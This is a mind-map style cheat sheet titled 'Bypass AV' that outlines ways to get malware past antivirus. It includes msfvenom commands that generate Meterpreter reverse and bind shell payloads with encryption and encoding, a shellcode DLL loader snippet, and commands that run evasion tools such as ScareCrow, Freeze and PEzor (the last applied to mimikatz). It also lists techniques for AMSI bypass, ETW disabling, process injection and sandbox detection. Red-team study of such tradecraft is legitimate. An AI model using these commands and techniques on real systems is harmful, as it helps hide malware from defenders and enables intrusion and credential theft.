--- markmap: colorFreezeLevel: 3 initialExpandLevel: 2 --- # Bypass AV ## Manual dropper ### C++ - ## Automatic dropper - ## Manual loader ### Reminder 1. allocating memory 2. moving shellcode into that memory 3. executing the shellcode ### Go - ### C - ```C #include #include int main(void) { HMODULE hMod = LoadLibrary("shellcode.dll"); if (hMod == nullptr) { cout << "Failed to load shellcode.dll" << endl; } return 0; } ``` ### C++ - - ### .NET - ### Ruby - ## Automatic loader ### C++/C# - - - - - - - - ### C - - - - - - - ### Nim - - - - ### Go - - - - - - - ### Rust - - - - - ### Crystal - ## Generate shellcode ### msfvenom - `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f raw` - `msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll` - `msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more` ### C2 (Cobalt/Havoc what ever) ### ASM - ### Hyperion - `wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe` ## Manual obfuscation ### Static - Packing - - - Polymorph - - Signature hiding - - CFG - ROP - - - - CFG flattening - - Change logo/icon - - Change date of compilation - Bypass AMSI - - - - Description - Add signature - ### dynamic - Network - C2 by DNS - P2P (hide ip from C2) - HTTPS - Direct syscalls - - - Delayed execution - WaitForSingleObjectEx - - Foliage - Ekko - A small sleep obfuscation technique that uses CreateTimerQueueTimer Win32 API - Deathsleep - - Disable ETW - - DInvoke - ## Automatic obfuscation ### Static - Packing - Office macro - - - - - - - - - - AMSI Bypass - - - - - Signature hiding - - `ScareCrow -I /Path/To/ShellCode -d facebook.com` - - LOLBIN - RemComSvc - - Entropy - ### Dynamic - Disable ETW - - - - - Indirect syscall - - `Freeze -I /PathToShellcode -encrypt -sandbox -o packed.exe` - - `PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2` - - - - Disable AV - - Block DLL - - Detect virtual machines - ## Process injection ### CRT - with suspended - ### APC (Asyncronous Procedure Call) - - - ### Process hollowing - - - - - ### Thread execution hijacking - ### PSC (Ptrace System Calls) ### Process Doppelganging - ### Dll injection - Reflective dll injection - - - - - DLL Sideloading & Proxying - ### RWX - You put your region in RW, you write your shellcode, then you reprotect in RX, then you run the thread. This way your region is never in rwx ### COM Hijack - - ### Remote thread - ### User APC - ## Detect virtual machines (Sandbox) ### Software - Count processus number - if >=40 its probably not a VM - User interaction - Send MessageBoxW - Check for internet - Datetime on compilation - Check for Computer name - VM = DESKTOP-[0-9A-Z]{7} ### Hardware - CPUID timing - - Typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive ### OSX - ### Tools - ## From PE to shellcode - - - ## From .exe (build with .net) to .exe hidden - ## From alive beacon ### Havoc - dotnet (object file) ### Cobalt - BoF (Beacon object file) - From .net to BoF - - ## Extensions ### Dll ### Exe ### Hta ### Cpl ### Link ## Crédits - [@Jenaye_fr](https://twitter.com/Jenaye_fr) - [LeDocteurDesBits](https://github.com/LeDocteurDesBits) - [michmich1000](https://github.com/michmich1000) - [@Zabannn](https://twitter.com/Zabannn) - [@noraj_rawsec](https://twitter.com/noraj_rawsec) - [@lapinousexy](https://github.com/lap1nou) - [@djnn](https://github.com/bogdzn) ## Pro tips : A shellcode going through 3 open-source packers will have more chance to get detected than a manual obfuscation